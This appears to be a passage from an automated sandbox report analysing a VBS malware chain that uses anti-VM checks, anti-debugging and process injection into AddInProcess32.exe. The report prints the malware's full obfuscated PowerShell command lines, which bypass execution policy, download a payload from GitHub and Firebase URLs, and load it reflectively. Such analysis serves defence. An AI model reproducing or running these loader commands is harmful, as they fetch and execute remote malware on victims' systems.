                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 4AD0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1186Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1779Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4772Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5038Jump to behavior
                  Source: C:\Windows\System32\wscript.exe TID: 5648Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224Thread sleep count: 4772 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep count: 5038 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: wscript.exe, 00000010.00000003.1518730090.000001C6D6811000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1518938557.000001C6D6211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490326369.000001C6D6415000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1519148651.000001C6D6611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1598119715.0000020092096000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1573280225.0000020091C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599185703.0000020091E91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599019680.0000020091A91000.00000004.00000020.00020000.00000000.sdmp, alcatifa.vbs.12.drBinary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
                  Source: wscript.exe, 00000000.00000003.1274196204.000001D52EE90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware\*.dmp@a
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: alcatifa.vbs.12.drBinary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
                  Source: wscript.exe, 00000000.00000003.1274196204.000001D52EE90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Global_Config\VMware Server\SSL@cNR
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: wscript.exe, 00000010.00000003.1491382989.000001C6D6363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490602929.000001C6D635C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" end sel(q6
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", teorizar + "\\Dumps\\");
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \VMware\*.dmp
                  Source: wscript.exe, 00000011.00000003.1573494529.0000020091BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1574053394.0000020091BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssio@cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" putXml
                  Source: wscript.exe, 00000011.00000003.1574053394.0000020091BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ingl*$output += "(Get-VMNetworkAdapter -all)"; eByXpa
                  Source: wscript.exe, 00000010.00000003.1518730090.000001C6D6811000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1518938557.000001C6D6211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490326369.000001C6D6415000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1519148651.000001C6D6611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1598119715.0000020092096000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1573280225.0000020091C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599185703.0000020091E91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599019680.0000020091A91000.00000004.00000020.00020000.00000000.sdmp, alcatifa.vbs.12.drBinary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
                  Source: wscript.exe, 00000010.00000003.1491382989.000001C6D6363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490602929.000001C6D635C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iJBJEC`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" eturnObjec
                  Source: AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: wscript.exe, 00000000.00000003.1275206400.000001D52D4C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275992535.000001D52D4C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517566590.000001D52D477000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520881773.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277153379.000001D52D4C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516476702.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516335318.000001D52D4C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520494676.000001D52D47D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000010.00000003.1490602929.000001C6D635C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eded*$output += "(Get-VMNetworkAdapter -all)"; t cmdl
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fso.DeleteFolder(teorizar + "\\Global_Config\\VMware Server\\SSL");
                  Source: wscript.exe, 00000011.00000003.1573494529.0000020091BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1574053394.0000020091BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iJsisI`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" analys
                  Source: powershell.exe, 0000000B.00000002.1467476371.0000027D758F0000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2558087878.00000000057C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: I@\Global_Config\VMware Server\SSLcNR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_02937070 CheckRemoteDebuggerPresent,14_2_02937070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAG
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 91D008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqganacsajwawadgadqbyagwaiaa9acaaqwanacsajwa3aekaaab0ahqacabzadoalwavahiayqanacsajwb3ac4ajwaraccazwbpaccakwanahqaaab1accakwanagiadqanacsajwbzaguacgbjag8abgb0accakwanaguabgb0accakwanac4aywanacsajwbvag0alwboaccakwanag8arablahqazqbjahqatwanacsajwbuac8atgbvaeqazqanacsajwb0aguaywb0ae8abgavahiazqbmahmajwaraccalwboaccakwanaguayqanacsajwbkaccakwanahmajwaraccalwanacsajwbtaccakwanageaaqbuac8arablaccakwanahqayqboae4abwanacsajwb0aggalqbwaccakwanac4adaanacsajwb4ahqaqwanacsajwa3aekaowagaeiamaanacsajwa4agiayqbzaccakwanaguanga0aemajwaraccabwanacsajwbuahqazqbuahqaiaa9acaakaboaguadwatae8aygbqaccakwanaguaywanacsajwb0acaauwb5ahmadablag0algboaguadaauafcazqanacsajwbiaemababpaguabgb0ackalgbeaccakwanag8adwbuagwabwanacsajwbhagqajwaraccauwb0ahiajwaraccaaqanacsajwbuagcakabcaccakwanadaaoab1accakwanahiabaanacsajwapadsaiabcadaajwaraccaoaanacsajwbiagkabgbhaccakwanahiajwaraccaeqanacsajwbdaccakwanag8abgb0accakwanaguabgb0acaapqanacsajwagafsauwb5ahmadaanacsajwblag0algbdag8abgb2aguajwaraccacgb0af0aoga6accakwanaeyacganacsajwbvag0aqgbhahmazqa2adqauwb0ahiaaqbuaccakwanagcakaanacsajwbcadaajwaraccaoabiageajwaraccacwbladyanaanacsajwbdag8abgb0accakwanaguabgb0ackaowagaccakwanaeiamaa4ageacwbzaguabqbiagwaeqagaccakwanad0aiabbafiazqbmagwajwaraccazqbjaccakwanahqajwaraccaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoataanacsajwbvageazaaoaeiamaa4accakwanagiaaqbuageacgb5aemajwaraccabwanacsajwbuahqazqbuaccakwanahqakqanacsajwa7acaawwbkag4ababpagiajwaraccalgbjaccakwanae8algbiaccakwanag8abqanacsajwblaccakwanaf0aoga6afyaqqanacsajwbjacgajwaraccacabraccakwanafuaoaa4adqazqanacsajwa4aguamabkaduamganacsajwbmadaalqanacsajwbladuayqanacsajwbiac0ajwaraccamqanacsajwaxadyanaatadaamabjadyajwaraccalqbhageayqayagyazga1aguajwaraccapqanacsajwbuaccakwanaguajwaraccaawanacsajwbvahqajgbhagkazablag0apqb0agwayqa/ahqaeaanacsajwb0accakwanac4anaayadaamgawadeanwawag4aaqbnaccakwanagkacgbvahiazqanacsajwbpahyayqb4ac8abwavag0abwanacsajwbjac4ajwaraccadabvahaacwbwahaayqauadqamgawadiacwanacsajwb0ahaaeqbyaccakwanagmajwaraccalwbiac8amab2accakwanac8abqbvagmajwaraccalganacsajwbzagkacabhaguababnaccakwanag8abwbnaccakwanac4azqanacsajwbnageacgbvaccakwanahqajwaraccacwblahmayqbiaccakwanaguacgbpagyajwaraccalwavadoajwaraccacwanacsajwbwahqajwaraccadaboahaauqbvacwajwaraccaiabwafeavqaxahaauqbvacwajwaraccaiabwafeavqbdadoavaanacsajwa0ahkauabyag8azwbyageabqbeageadabhaccakwanafqanaanacsajwb5accakwanahaauqbvacwaiabwaccakwanafeavqbhaccakwanagwaywbhahqaaqanacsajwbmageacaanacsajwbrafualaagahaauqbvaeeazabkaekabgbqahiajwaraccabwbjaguacwbzadmajwaraccamganacsajwbwafeavqasacaacabraccakwanafuacabrafualabwaccakwanafeavqanacsajwbwaccakwanafeavqapaccakqagacaalqbdahiazqbwaewayqbdaguaiaaoafsaqwboageaugbdadeamqayacsawwbdaggayqbsaf0aoaaxacsawwbdaggayqbsaf0aoaa1ackalabbaemaaabhafiaxqazadqaiaagac0aqwbyaguacabmageaqwblacaaiaaoafsaqwboageaugbdadyanwarafsaqwboageaugbdaduanqarafsaqwboageaugbdadcamwapacwawwbdaggayqbsaf0amwa5acaaiaatafiazqbqag
